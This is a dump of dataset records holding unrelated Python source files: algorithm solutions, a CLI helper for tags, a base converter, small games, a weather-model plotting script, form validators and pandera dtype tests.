 def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n '''\n A more concise version.\n '''\n res, q = [], collections.deque()\n for i in range(len(nums)):\n if q and q[0][0] <= i - k: q.popleft()\n while q and nums[i] > q[-1][1]:\n q.pop()\n # append once the deque is empty or the current number is smaller than the tail\n q.append((i, nums[i]))\n res.append(q[0][1])\n return res[k-1:]\n \n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n '''\n Monotonic queue -- first idea: when inserting, only insert elements larger than the last element of the queue <-- wrong.\n Use a monotonically decreasing stack instead, so the maximum element is always leftmost.\n Such a stack satisfies a condition a heap cannot: its head is both the largest and the leftmost element of the current window.\n '''\n res, q = [], []\n q.append((-1, float(\"inf\"))) # sentinel element, avoids empty checks\n for i in range(k):\n while q[-1][1] < nums[i]: q.pop()\n q.append((i, nums[i]))\n # print(q)\n res.append(q[1][1])\n for i in range(k, len(nums)):\n if i - q[1][0] >= k : q.pop(1)\n while q[-1][1] < nums[i]: q.pop()\n q.append((i, nums[i]))\n # print(q)\n res.append(q[1][1])\n return res","sub_path":"Week_01/239. 滑动窗口最大值.py","file_name":"239. 滑动窗口最大值.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"281799456","text":"'''Arsenal client tag command line helpers.\n\nThese functions are called directly by args.func() to invoke the\nappropriate action. They also handle output formatting to the command\nline.\n\n'''\n#\n# Copyright 2015 CityGrid Media, LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom __future__ import print_function\nimport logging\nfrom arsenalclient.cli.common import (\n ask_yes_no,\n check_resp,\n parse_cli_args,\n print_results,\n )\n\nLOG = logging.getLogger(__name__)\n\n\ndef search_tags(args, client):\n '''Search for tags and perform optional assignment actions.'''\n\n LOG.debug('action_command is: {0}'.format(args.action_command))\n LOG.debug('object_type is: {0}'.format(args.object_type))\n\n resp = None\n\n params = parse_cli_args(args.search, args.fields, args.exact_get, args.exclude)\n resp = client.tags.search(params)\n\n if not resp.get('results'):\n return resp\n\n results = resp['results']\n\n if args.audit_history:\n results = client.tags.get_audit_history(results)\n\n # switch to any if there's more than one\n if not args.set_tags:\n\n first_keys = [\n 'name',\n 'value',\n ]\n print_results(args, results, first_keys=first_keys, default_key='tag')\n\n else:\n LOG.info('Assigning tags via tag search is not implemented.')\n\n if resp:\n check_resp(resp)\n LOG.debug('Complete.')\n\ndef create_tag(args, client):\n '''Create a new tag.'''\n\n params = {\n 'name': args.tag_name,\n 'value': args.tag_value,\n }\n\n client.tags.create(params)\n\ndef delete_tag(args, client):\n '''Delete an existing tag. Requires a tag name and value.'''
\n\n LOG.debug('action_command is: {0}'.format(args.action_command))\n LOG.debug('object_type is: {0}'.format(args.object_type))\n\n search = {\n 'name': args.tag_name,\n 'value': args.tag_value,\n 'exact_get': True,\n }\n\n resp = client.tags.search(search)\n\n results = resp['results']\n\n if results:\n r_names = []\n for tag in results:\n r_names.append('{0}={1}'.format(tag['name'], tag['value']))\n\n msg = 'We are ready to delete the following {0}: ' \\\n '\\n{1}\\n Continue?'.format(args.object_type, '\\n '.join(r_names))\n\n if ask_yes_no(msg, args.answer_yes):\n for tag in results:\n resp = client.tags.delete(tag)\n check_resp(resp)\n","sub_path":"client/arsenalclient/cli/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"113557966","text":"import baseconvert\r\n\r\ndef convert_num_sys(number, sys_now, sys_will):\r\n\t\"\"\"baseconvert.base does not support negative numbers, so this wrapper is needed.\"\"\"\r\n\tret = number\r\n\tneg = ret[0] == '-'\r\n\tif neg:\r\n\t\t\"\"\"Stripping characters out of strings is awkward. Why don't strings support del?\"\"\"\r\n\t\tret = ret[1:len(ret)]\r\n\tret = baseconvert.base(ret, sys_now, sys_will, string=True, recurring=False)\r\n\tif neg:\r\n\t\t\"\"\"The sign that was removed must be restored the same way\"\"\"\r\n\t\tret = '-' + ret\r\n\tif ret[-1] == '.':\r\n\t\tret += '0'\r\n\ttry:\r\n\t\t\"\"\"Check whether the number is an integer\"\"\"\r\n\t\tint(ret)\r\n\texcept:\r\n\t\t\"\"\"If the number is not an integer, round it\"\"\"\r\n\t\tif sys_will <= 10:\r\n\t\t\tret = str(round(float(ret), 8))\r\n\treturn ret\r\n\r\nallow = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9',\r\n\t\t 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J',\r\n\t\t 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',\r\n\t\t 'U', 'V', 'W', 'X', 'Y', 'Z']\r\ndef isdigit(num):\r\n\t\"\"\"A check that works across number systems is needed; in base 16 the letter F is also a digit\"\"\"\r\n\treturn num in allow\r\n\r\ndef convert_num_sys_math_expr(str, sys_now, sys_will):\r\n\t\"\"\"Converts the base of every number inside a math expression\"\"\"\r\n\ti = 0\r\n\t\"\"\"Needed so that: the last number gets converted (this is what the '\\\\n' is for.\r\n\t\t\t\t \t Why? A number is processed only when something other than '.', ',' or a digit is found.\r\n\t\t\t\t \t Without the '\\\\n' the last number would be skipped) and to signal the end of the string,\r\n\t\t\t\t \t i.e. when the '\\\\0' character appears the string is finished.\"\"\"\r\n\tstr += '\\\\n\\\\0' \r\n\tnum = \"\"\r\n\tnum_start = 0\r\n\tnum_end = 0\r\n\tret = \"\"\r\n\twhile str[i] != '\\\\0':\r\n\t\tif str[i] == ' ':\r\n\t\t\ti += 1\r\n\t\t\tcontinue\r\n\t\t\"\"\"A problem arose here: absolutely any number can be represented with letters,\r\n\t\t as long as it is in the right number system.\r\n\t\t Solved. Sort of.\"\"\"
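\r\n\t\t# NOTE (illustrative, added for clarity) -- example outputs, assuming the\r\n\t\t# baseconvert package behaves as this code expects:\r\n\t\t#   convert_num_sys(\"FF\", 16, 10)             -> \"255\"\r\n\t\t#   convert_num_sys_math_expr(\"2 + 2\", 10, 2) -> \"10 + 10\"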
\r\n\t\tif isdigit(str[i]):\r\n\t\t\tif num == \"\":\r\n\t\t\t\tnum_start = i\r\n\t\t\t\tnum_end = i\r\n\t\t\telse:\r\n\t\t\t\tnum_end += 1\r\n\t\t\tnum += str[i]\r\n\t\telif (str[i] == '.') | (str[i] == ','):\r\n\t\t\tnum_end += 1\r\n\t\t\tnum += str[i]\r\n\t\telse:\r\n\t\t\tif num == \"\":\r\n\t\t\t\ti += 1\r\n\t\t\t\tcontinue\r\n\t\t\ttmp = convert_num_sys(num, sys_now, sys_will)\r\n\t\t\ttmp_str = str[0:num_start] + tmp + str[num_end + 1:len(str)]\r\n\t\t\t\"\"\"dif is the difference between the new string length and the previous one.\r\n\t\t\t Converting from one base to another sometimes changes the number of\r\n\t\t\t digit positions in a number, so i must be incremented to step past the \r\n\t\t\t inserted number. Example: 2 + 2, base 10 -> base 2. The number of positions changed:\r\n\t\t\t the number 2 in binary is 10, so we have to skip past that number.\"\"\"\r\n\t\t\tdif = len(tmp_str) - len(str)\r\n\t\t\tif dif != 0:\r\n\t\t\t\ti += dif\r\n\t\t\tstr = tmp_str\r\n\t\t\tnum = \"\"\r\n\t\ti += 1\r\n\t\"\"\"The -2 strips the '\\\\n' and '\\\\0' that were appended earlier\"\"\"\r\n\treturn str[0:len(str) - 2]\r\n\r\na = convert_num_sys_math_expr(\"aa\", 16, 10)\r\nprint(a)","sub_path":"number_system.py","file_name":"number_system.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"202616049","text":"from words import *\nfrom outputs import *\n\n\nword, answer = default()\nattempts = 10\nused_attempts = 0\ncorrect = True\n\n\nwhile True:\n show_status(answer, used_attempts, attempts)\n letter = input(\"Letter: \")\n if not letter:\n print(\"You must type a letter.\")\n else:\n if len(letter) == 1:\n answer, correct = letter_in_answer(letter, answer, word)\n if is_end(letter, answer, word, used_attempts, attempts):\n word, answer = default()\n attempts = 10\n used_attempts = -1\n if not correct:\n used_attempts += 1\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"88409361","text":"import numpy as np\nfrom netCDF4 import Dataset\nfrom datetime import datetime\nfrom datetime import timedelta\n\nimport os\nimport sys\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nimport matplotlib.colors as mcolors\nimport matplotlib.patches as patches\n\nfrom tools_LT import read_evar_only\n\nquick = True\n#quick = False\n\ndef read_vars( INFO, tlev=0, HIM8=True ):\n\n # Read variables\n if HIM8:\n fn_Him8 = os.path.join( INFO[\"GTOP\"], INFO[\"EXP\"], INFO[\"time0\"].strftime('%Y%m%d%H%M%S'), INFO[\"TYPE\"], INFO[\"MEM\"], \n \"Him8_\" + INFO[\"time0\"].strftime('%Y%m%d%H%M%S_') + INFO[\"MEM\"] + \".nc\") \n print( fn_Him8 )\n nc = Dataset(fn_Him8, 'r', format='NETCDF4')\n tbb = nc.variables[\"tbb\"][tlev,:,:,:]\n nc.close()\n else:\n tbb = np.zeros(1)\n\n fn_radar = os.path.join( INFO[\"GTOP\"], INFO[\"EXP\"], INFO[\"time0\"].strftime('%Y%m%d%H%M%S'), INFO[\"TYPE\"], INFO[\"MEM\"], \n \"radar_\" + INFO[\"time0\"].strftime('%Y%m%d%H%M%S_') + INFO[\"MEM\"] + \".nc\") \n print( fn_radar, tlev )\n nc = Dataset(fn_radar, 'r', format='NETCDF4')\n if INFO[\"TYPE\"] == \"fcst\":\n z = nc.variables[\"z\"][tlev,:,:,:]\n vr = nc.variables[\"vr\"][tlev,:,:,:]\n else:\n z = nc.variables[\"z\"][:,:,:]\n vr = nc.variables[\"vr\"][:,:,:]\n nc.close()\n\n return( tbb, z, vr )\n\ndef main( INFO, EXP1=\"2000m_DA_0306\", EXP2=\"2000m_DA_0306\", tlev=0, 
typ=\"anal\", vname=\"QG\" ):\n\n data_path = \"../../dat4figs/Fig05\"\n os.makedirs( data_path, exist_ok=True )\n\n print( tlev, INFO[\"DT\"]*tlev )\n\n #ctime = datetime(2001, 1, 1, 1, 0) + timedelta(seconds=INFO[\"DT\"]*tlev ) \n ctime = INFO[\"time0\"] + timedelta(seconds=INFO[\"DT\"]*tlev ) \n if typ is not \"fcst\":\n ctime = datetime(2001, 1, 1, 1, 0) + timedelta(seconds=INFO[\"DT\"]*tlev ) \n\n INFO[\"EXP\"] = EXP1\n INFO[\"MEM\"] = \"mean\"\n INFO[\"TYPE\"] = typ\n if typ is not \"fcst\":\n INFO[\"time0\"] = ctime\n\n print(\"CHECK\", INFO[\"time0\"] )\n# tbb_exp1, z_exp1, vr_exp1 = read_vars( INFO, tlev=tlev, HIM8=False )\n# evar_exp1 = read_evar_only( INFO, tlev=tlev, vname=vname )\n# efp_exp1 = read_evar_only( INFO, tlev=tlev, vname=\"FP\" )\n\n INFO[\"EXP\"] = EXP2\n# tbb_exp2, z_exp2, vr_exp2 = read_vars( INFO, tlev=tlev, HIM8=False )\n# evar_exp2 = read_evar_only( INFO, tlev=tlev, vname=vname )\n# efp_exp2 = read_evar_only( INFO, tlev=tlev, vname=\"FP\" )\n\n ft_sec = int( INFO[\"DT\"]*tlev )\n\n # nature run\n # read variables\n INFO[\"EXP\"] = EXP1\n INFO[\"MEM\"] = \"mean\"\n INFO[\"TYPE\"] = \"fcst\"\n INFO[\"time0\"] = datetime(2001, 1, 1, 1, 0)\n tlev_nat = int( ( ctime - datetime(2001, 1, 1, 1, 0) ).total_seconds() / INFO[\"DT\"] )\n print( \"DEBUG\", tlev_nat, ctime)\n# tbb_nat, z_nat, vr_nat = read_vars( INFO, tlev=tlev_nat, HIM8=False )\n# evar_nat = read_evar_only( INFO, tlev=tlev_nat, vname=vname )\n# efp_nat = read_evar_only( INFO, tlev=tlev_nat, vname=\"FP\" )\n# \n# print(\"evars: \", evar_nat.shape, evar_exp1.shape, evar_exp2.shape )\n\n\n tit_l = [ \"NODA (analysis)\", \n \"RDA (analysis)\", \n \"Nature run\" ]\n if typ is \"fcst\":\n foot = \"\\n(fcst from mean)\"\n if ft_sec == 0:\n foot = \"\\n(analysis)\"\n tit_l = [\n \"NODA\" + foot, \n \"RDA\" + foot, \n \"Nature run\",\n \"NODA\" + foot, \n \"RDA\" + foot, \n \"Nature run\",\n ]\n\n# print( z_nat.shape, z_exp1.shape, z_exp2.shape )\n\n\n fig, ((ax1,ax2,ax3), (ax4,ax5,ax6) ) = plt.subplots(2, 3, figsize=(11,8.2))\n fig.subplots_adjust(left=0.06, bottom=0.05, right=0.93, top=0.94,\n wspace=0.2, hspace=0.3)\n \n ax_l = [ax1, ax2, ax3, ax4, ax5, ax6]\n\n levs_dbz= np.array([15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65])\n cmap_dbz = mcolors.ListedColormap(['cyan','dodgerblue', \n 'lime', 'limegreen','yellow',\n 'orange', 'red', 'firebrick', 'magenta',\n 'purple'])\n cmap_dbz.set_under('w', alpha=1.0)\n cmap_dbz.set_over('gray', alpha=1.0)\n\n cmap_rb = plt.cm.get_cmap(\"RdBu_r\")\n cmap_rb.set_under('gray', alpha=1.0)\n cmap_rb.set_over('gray', alpha=1.0)\n\n\n unit_dbz = \"(dBZ)\"\n unit_crg = r'(nC m$^{-3}$)'\n \n #levs_rb_qcrg = np.array([-1, -0.8, -0.6, -0.4, -0.2, -0.1,\n # 0.1, 0.2, 0.4, 0.6, 0.8, 1])\n levs_rb_qcrg = np.array([-0.4, -0.3, -0.2, -0.1, -0.05, -0.01,\n 0.01, 0.05, 0.1, 0.2, 0.3, 0.4, ])\n\n\n levs_rb_qcrg = np.array([-0.6, -0.4, -0.2, -0.1, -0.05, -0.01,\n 0.01, 0.05, 0.1, 0.2, 0.4, 0.6])\n\n levs_l = [ levs_dbz, levs_dbz, levs_dbz, \n levs_rb_qcrg, levs_rb_qcrg, levs_rb_qcrg]\n cmap_l = [ cmap_dbz, cmap_dbz, cmap_dbz, \n cmap_rb, cmap_rb, cmap_rb ]\n unit_l = [ unit_dbz, unit_dbz, unit_dbz,\n unit_crg, unit_crg, unit_crg ]\n\n pnum_l = [\n \"(a)\", \"(b)\", \"(c)\",\n \"(d)\", \"(e)\", \"(f)\",\n ]\n\n tvar = vname\n if vname is \"QCRG\":\n levs = levs_rb_qcrg\n cmap = cmap_rb\n unit = unit_crg\n tvar = \"Total charge density\"\n\n\n bbox = { 'facecolor':'w', 'alpha':0.95, 'pad':1.5, 'edgecolor':'w' }\n\n\n xmin = 120\n xmax = 280\n ymin = 120\n ymax = 320\n\n\n ft_sec_a = int( ( 
ctime - INFO[\"time00\"] ).total_seconds() )\n print( \"ctime\",ctime, tlev, INFO[\"DT\"])\n\n \n xlabel = \"X (km)\"\n ylabel = \"Y (km)\"\n\n xaxis = INFO[\"X\"][:] * 0.001\n yaxis = INFO[\"Y\"][:] * 0.001\n\n x2d, y2d = np.meshgrid( yaxis, xaxis )\n xdgrid = 20\n ydgrid = 20\n\n zlev_show = 8 \n zlev_show = 10\n zlev_show = 16\n zlev_show = 14 # comment out \n\n if typ is not \"fcst\":\n info = 't={0:.0f} min\\nZ={1:} km'.format( ft_sec_a/60.0, INFO[\"Z\"][zlev_show]/1000)\n else:\n info = 't={0:.0f} min (FT={1:.0f} min)\\nZ={2:} km'.format( ft_sec_a/60.0, ft_sec/60.0, INFO[\"Z\"][zlev_show]/1000)\n \n# if typ is not \"fcst\":\n# VAR_l = [ \n# z_exp1[zlev_show,:,:], \n# z_exp2[zlev_show,:,:], \n# z_nat[zlev_show,:,:],\n# evar_exp1[0,zlev_show,:,:], \n# evar_exp2[0,zlev_show,:,:], \n# evar_nat[0,zlev_show,:,:]]\n# else:\n# VAR_l = [ \n# z_exp1[zlev_show,:,:], \n# z_exp2[zlev_show,:,:], \n# z_nat[zlev_show,:,:], \n# evar_exp1[0,zlev_show,:,:], \n# evar_exp2[0,zlev_show,:,:], \n# evar_nat[0,zlev_show,:,:]\n# ]\n# FP_l = [ np.sum( efp_exp1[0,:,:,:], axis=0), \n# np.sum(efp_exp2[0,:,:,:], axis=0), \n# np.sum(efp_nat[0,:,:,:], axis=0) ]\n\n for idx, ax in enumerate(ax_l):\n fn = '{0:}/data{1:0=2}.npz'.format( data_path, idx )\n print( fn )\n# np.savez( fn, data=VAR_l[idx][:,:] )\n data = np.load( fn )['data']\n\n# print(idx,tit_l[idx])\n# print( VAR_l[idx].shape, np.max(VAR_l[idx]), np.min(VAR_l[idx]) )\n\n #SHADE = ax.pcolormesh(x2d, y2d,\n SHADE = ax.contourf(x2d, y2d,\n data,\n #VAR_l[idx][:,:],\n levels=levs_l[idx],\n #vmin=np.min(levs),\n #vmax=np.max(levs),\n cmap=cmap_l[idx],\n extend='both',\n )\n\n if typ is \"fcst\" and ft_sec > 0:\n ssize = 10.0\n idx_ = idx\n if idx > 2:\n idx_ = idx - 3\n# fp2d = FP_l[idx_] \n# #fp2d[ fp2d < 1.0 ] = np.nan\n# #fp2d = fp2d / ssize\n# fp2d = np.where( fp2d >= 1.0, ssize, np.nan )\n fn_fp = '{0:}/data{1:0=2}_fp.npz'.format( data_path, idx )\n# np.savez( fn_fp, data=fp2d )\n data = np.load( fn_fp )['data']\n #ax.scatter( x2d, y2d, s=fp2d, \n ax.scatter( x2d, y2d, s=data, \n c='k', marker='s', \n edgecolors=\"w\", linewidths=0.5 )\n\n ax.set_xlim( xmin, xmax )\n ax.set_ylim( ymin, ymax )\n ax.xaxis.set_ticks( np.arange(xmin, xmax, xdgrid) )\n ax.yaxis.set_ticks( np.arange(ymin, ymax, ydgrid) )\n ax.tick_params(axis='both', which='minor', labelsize=7 )\n ax.tick_params(axis='both', which='major', labelsize=7 )\n\n ax.text(0.5, 0.95, tit_l[idx],\n fontsize=12, transform=ax.transAxes,\n horizontalalignment='center',\n verticalalignment='top', \n bbox=bbox )\n \n ax.text(0.1, 0.95, pnum_l[idx],\n fontsize=10, transform=ax.transAxes,\n horizontalalignment='center',\n verticalalignment='top', \n bbox=bbox )\n\n ax.set_xlabel( xlabel, fontsize=8 )\n ax.set_ylabel( ylabel, fontsize=8 )\n\n if idx == 2 or idx == 5:\n \n pos = ax.get_position()\n cb_h = pos.height\n cb_w = 0.01\n ax_cb = fig.add_axes( [pos.x1+0.01, pos.y0, cb_w, cb_h] )\n cb = plt.colorbar( SHADE, cax=ax_cb, orientation = 'vertical', \n ticks=levs_l[idx], extend='both' )\n cb.ax.tick_params( labelsize=8 )\n ax.text( 1.0, -0.03, unit_l[idx],\n fontsize=9, transform=ax.transAxes,\n horizontalalignment='left',\n verticalalignment='top', )\n \n ax.text( 1.0, 1.1, info,\n fontsize=10, transform=ax.transAxes,\n horizontalalignment='right',\n verticalalignment='center', )\n\n if idx == 1 or idx == 4:\n tvar_ = tvar\n if idx == 1:\n tvar_ = \"Radar reflectivity\"\n ax.text( 0.5, 1.1, tvar_,\n fontsize=15, transform=ax.transAxes,\n horizontalalignment='center',\n verticalalignment='center', )\n\n# 
\n\n\n #odir = \"png/6p_DA_var\" \n odir = \"pdf/fig20210624\" \n\n #ofig = '6p_{:1}_{:2}_{:3}_fta{:05}_ft{:05}_z{:0=2}_{:}.png'.format(typ, EXP1, EXP2, ft_sec_a, ft_sec, zlev_show, vname)\n ofig = '6p_{:1}_{:2}_{:3}_fta{:05}_ft{:05}_z{:0=2}_{:}.pdf'.format(typ, EXP1, EXP2, ft_sec_a, ft_sec, zlev_show, vname)\n\n\n print( ofig, odir )\n \n if not quick:\n os.makedirs(odir, exist_ok=True)\n plt.savefig(os.path.join(odir,ofig),\n bbox_inches=\"tight\", pad_inches = 0.1)\n plt.clf()\n plt.close('all')\n else:\n plt.show()\n\n\n\n###################\n\nDX = 2000.0\nDY = 2000.0\nXDIM = 192\nYDIM = 192\nTDIM = 13\nZDIM = 40\n\nXDIM = 176\nYDIM = 176\nZDIM = 45\n\nDZ = 500.0\nDT = 300\n\nX = np.arange( DX*0.5, DX*XDIM, DX )\nY = np.arange( DY*0.5, DY*YDIM, DY )\nT = np.arange( 0, DT*TDIM, DT )\nBAND = np.arange( 7, 17, 1 )\n\nZ = np.arange(DZ*0.5, DZ*ZDIM, DZ)\n\n#EXP = \"2000m_NODA_1022_FIR2km_N\"\n#time0 = datetime( 2001, 1, 1, 1, 0, 0 )\nEXP = \"2000m_DA_1022_FIR2km_N\"\n\nEXP = \"2000m_DA_0302\"\n\nEXP1 = \"2000m_DA_0306\"\n\nEXP1 = \"2000m_NODA_0306\"\nEXP2 = \"2000m_DA_0306\"\n\n\nEXP1 = \"2000m_NODA_0601\"\nEXP2 = \"2000m_DA_0601\"\n\nEXP1 = \"2000m_NODA_0723\"\nEXP2 = \"2000m_DA_0723\"\n\n#EXP1 = \"2000m_DA_0306_R_FP_180km\"\n\ntime0 = datetime( 2001, 1, 1, 1, 20, 0 ) \ntime0 = datetime( 2001, 1, 1, 1, 30, 0 ) \n\nGTOP = \"/data_honda01/honda/SCALE-LETKF/scale-LT/OUTPUT\"\nTYPE = \"fcst\"\nMEM = \"mean\"\nMEM = \"0025\"\ntime00 = datetime( 2001, 1, 1, 0, 0, 0 )\n\nINFO = {\"XDIM\":XDIM, \"YDIM\":YDIM, \"NBAND\":10, \"TDIM\":TDIM,\n \"X\":X, \"Y\":Y , \"BAND\":BAND, \"T\":T, \"GTOP\":GTOP,\n \"ZDIM\":ZDIM, \"Z\":Z, \"DT\":DT,\n \"TYPE\":TYPE, \"MEM\":MEM, \"EXP\":EXP,\n \"time0\": time0, \"time00\": time00 }\n\ntmax = 13\ntmax = 7\ntmin = 0\n\ntmin = 0\ntmax = tmin + 1\ntmin = 6\ntmax = 7\n#tmax = 1\n\ntyp = \"anal\"\ntyp = \"fcst\"\n\nvname = \"QCRG\"\n\n\nif typ != \"fcst\":\n tmin = 1\n\nfor tlev in range( tmin, tmax ):\n INFO[\"time0\"] = time0\n main( INFO, EXP1=EXP1, EXP2=EXP2, tlev=tlev, typ=typ, vname=vname )\n","sub_path":"src/Fig05_repo.py","file_name":"Fig05_repo.py","file_ext":"py","file_size_in_byte":12092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"294402653","text":"from wtforms import ValidationError\n\n\nclass Length:\n def __init__(self, min=-1, max=-1, message=None):\n self.min = min\n self.max = max\n if not message:\n message = u'Field must be between {} and {}'.format(min, max)\n\n self.message = message\n\n def __call__(self, form, field):\n length = field.data and len(field.data) or 0\n if length < self.min or self.max != -1 and length > self.max:\n raise ValidationError(self.message)\n\n\nlength = Length\n\n\nclass IsValidValue:\n def __init__(self, min=0, max=0, message=None):\n self.min = min\n self.max = max\n if not message:\n message = u'Field must be between {} and {}'.format(min, max)\n\n self.message = message\n\n def __call__(self, form, field):\n value = field.data\n if not (value <= self.max and value >= self.min):\n raise ValidationError(self.message)\n\n\nisValidValue = IsValidValue\n","sub_path":"meetthings/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"141854174","text":"# Finder\n# Lets you find the number of occurrences of a letter in a word\n\ndef main():\n \n # For entering a word\n name = input('Enter a Name: ').lower()
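 # NOTE (added for clarity): the counting loop below could also be replaced\n # by the built-in str.count, e.g. count = name.count(lett).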
').lower()\n \n #For entering the letter you want to search for\n lett = input('What Letter Do You Want to Find: ')\n\n count = 0\n\n for c in nanme:\n if c == lett:\n count +=1\n print(count) \n\n \n\n\nmain() \n","sub_path":"ActualCode.py","file_name":"ActualCode.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"405998270","text":"\"\"\"Tests a variety of python and pandas dtypes, and tests some specific\ncoercion examples.\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nfrom packaging import version\n\nimport pandera as pa\nfrom pandera import (\n Bool,\n Category,\n Check,\n Column,\n DataFrameSchema,\n DateTime,\n Float,\n Int,\n Object,\n PandasDtype,\n SeriesSchema,\n String,\n Timedelta,\n)\nfrom pandera.dtypes import (\n _DEFAULT_NUMPY_FLOAT_TYPE,\n _DEFAULT_NUMPY_INT_TYPE,\n _DEFAULT_PANDAS_FLOAT_TYPE,\n _DEFAULT_PANDAS_INT_TYPE,\n)\nfrom pandera.errors import SchemaError\n\nPANDAS_VERSION = version.parse(pd.__version__)\n\nTESTABLE_DTYPES = [\n (Bool, \"bool\"),\n (DateTime, \"datetime64[ns]\"),\n (Category, \"category\"),\n (Float, Float.str_alias),\n (Int, Int.str_alias),\n (Object, \"object\"),\n (String, String.str_alias),\n (Timedelta, \"timedelta64[ns]\"),\n (\"bool\", \"bool\"),\n (\"datetime64[ns]\", \"datetime64[ns]\"),\n (\"category\", \"category\"),\n (\"float64\", \"float64\"),\n]\n\n\ndef test_default_numeric_dtypes():\n \"\"\"Test that default numeric dtypes int and float are consistent.\"\"\"\n assert str(pd.Series([1]).dtype) == _DEFAULT_PANDAS_INT_TYPE\n assert pa.Int.str_alias == _DEFAULT_PANDAS_INT_TYPE\n assert str(pd.Series([1], dtype=int).dtype) == _DEFAULT_NUMPY_INT_TYPE\n assert str(pd.Series([1], dtype=\"int\").dtype) == _DEFAULT_NUMPY_INT_TYPE\n\n assert str(pd.Series([1.0]).dtype) == _DEFAULT_PANDAS_FLOAT_TYPE\n assert pa.Float.str_alias == _DEFAULT_PANDAS_FLOAT_TYPE\n assert (\n str(pd.Series([1.0], dtype=float).dtype) == _DEFAULT_NUMPY_FLOAT_TYPE\n )\n assert (\n str(pd.Series([1.0], dtype=\"float\").dtype) == _DEFAULT_NUMPY_FLOAT_TYPE\n )\n\n\ndef test_numeric_dtypes():\n \"\"\"Test every numeric type can be validated properly by schema.validate\"\"\"\n for dtype in [pa.Float, pa.Float16, pa.Float32, pa.Float64]:\n assert all(\n isinstance(\n schema.validate(\n pd.DataFrame(\n {\"col\": [-123.1, -7654.321, 1.0, 1.1, 1199.51, 5.1]},\n dtype=dtype.str_alias,\n )\n ),\n pd.DataFrame,\n )\n for schema in [\n DataFrameSchema({\"col\": Column(dtype, nullable=False)}),\n DataFrameSchema(\n {\"col\": Column(dtype.str_alias, nullable=False)}\n ),\n ]\n )\n\n for dtype in [pa.Int, pa.Int8, pa.Int16, pa.Int32, pa.Int64]:\n assert all(\n isinstance(\n schema.validate(\n pd.DataFrame(\n {\"col\": [-712, -4, -321, 0, 1, 777, 5, 123, 9000]},\n dtype=dtype.str_alias,\n )\n ),\n pd.DataFrame,\n )\n for schema in [\n DataFrameSchema({\"col\": Column(dtype, nullable=False)}),\n DataFrameSchema(\n {\"col\": Column(dtype.str_alias, nullable=False)}\n ),\n ]\n )\n\n for dtype in [pa.UInt8, pa.UInt16, pa.UInt32, pa.UInt64]:\n assert all(\n isinstance(\n schema.validate(\n pd.DataFrame(\n {\"col\": [1, 777, 5, 123, 9000]}, dtype=dtype.str_alias\n )\n ),\n pd.DataFrame,\n )\n for schema in [\n DataFrameSchema({\"col\": Column(dtype, nullable=False)}),\n DataFrameSchema(\n {\"col\": Column(dtype.str_alias, nullable=False)}\n ),\n ]\n )\n\n\n@pytest.mark.skipif(\n PANDAS_VERSION.release < (1, 0, 0), # type: ignore\n reason=\"pandas >= 1.0.0 
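# Hedged aside on the letter-counting Finder script above: the manual
# counting loop is equivalent to the built-in str.count, e.g.
nanme = input('Enter a Name: ').lower()
lett = input('What Letter Do You Want to Find: ')
print(nanme.count(lett))   # same result as the explicit for-loop above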
required\",\n)\n@pytest.mark.parametrize(\n \"dtype\",\n [\n pa.INT8,\n pa.INT16,\n pa.INT32,\n pa.INT64,\n pa.UINT8,\n pa.UINT16,\n pa.UINT32,\n pa.UINT64,\n ],\n)\n@pytest.mark.parametrize(\"coerce\", [True, False])\ndef test_pandas_nullable_int_dtype(dtype, coerce):\n \"\"\"Test that pandas nullable int dtype can be specified in a schema.\"\"\"\n assert all(\n isinstance(\n schema.validate(\n pd.DataFrame(\n # keep max range to 127 in order to support Int8\n {\"col\": range(128)},\n **({} if coerce else {\"dtype\": dtype.str_alias}),\n )\n ),\n pd.DataFrame,\n )\n for schema in [\n DataFrameSchema(\n {\"col\": Column(dtype, nullable=False)}, coerce=coerce\n ),\n DataFrameSchema(\n {\"col\": Column(dtype.str_alias, nullable=False)}, coerce=coerce\n ),\n ]\n )\n\n\n@pytest.mark.parametrize(\"str_alias\", [\"foo\", \"bar\", \"baz\", \"asdf\", \"qwerty\"])\ndef test_unrecognized_str_aliases(str_alias):\n \"\"\"Test that unrecognized string aliases are supported.\"\"\"\n with pytest.raises(TypeError):\n PandasDtype.from_str_alias(str_alias)\n\n\ndef test_category_dtype():\n \"\"\"Test the category type can be validated properly by schema.validate\"\"\"\n schema = DataFrameSchema(\n columns={\n \"col\": Column(\n pa.Category,\n checks=[\n Check(lambda s: set(s) == {\"A\", \"B\", \"C\"}),\n Check(\n lambda s: s.cat.categories.tolist() == [\"A\", \"B\", \"C\"]\n ),\n Check(lambda s: s.isin([\"A\", \"B\", \"C\"])),\n ],\n nullable=False,\n ),\n },\n coerce=False,\n )\n 